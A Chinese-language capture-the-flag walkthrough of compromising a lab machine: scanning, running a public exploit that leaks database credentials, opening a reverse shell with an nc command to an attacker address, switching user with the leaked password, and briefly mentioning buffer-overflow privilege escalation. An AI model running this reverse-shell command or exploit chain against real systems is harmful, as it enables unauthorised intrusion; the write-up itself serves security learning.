先扫一下c段发现靶机

image-20230430223340760

然后扫一下端口

image-20230430223410966

发现了个新端口 没见过

image-20230430223613576

还是先查看一下80端口

image-20230430223917177

查看源码发现版本和框架

那么就去找一下看存不存在漏洞

image-20230430224032571

发现存在漏洞,于是就尝试进行漏洞利用

image-20230430224139189

然后将脚本复制到出来执行

image-20230430224307635

image-20230430224450992

刚好发现了数据库的账号密码

这里的话使用的python2 python3的话会报错

这里看的不方便,于是尝试一下反弹shell

image-20230430224534036

存在nc命令,可以使用nc反弹

1
nc 192.168.142.129 6666 -e /bin/bash

image-20230430224640615

反弹shell成功,那么我们就进行python的shell交互一下

那么我们就尝试一下刚刚拿到的数据的账号密码进行用户的切换

clapton / yaraklitepe

因为直接cd /home/clapton 权限不够

image-20230430224951322

成功了

然后就可以拿到第一个flag了

image-20230430225059208

这里的话又给出一个缓冲区溢出提权:

先把input文件下到本地

开启有个服务 python -m SimpleHTTPServer 因为http模块没有,就只能用这个模块了

image-20230430230743704

成功下到本地

这里进行了解就行了 缓冲区溢出提权知道就行 实际的操作不太会

总结

开启python服务的两个方法

python -m SimpleHTTPServer

python -m http.server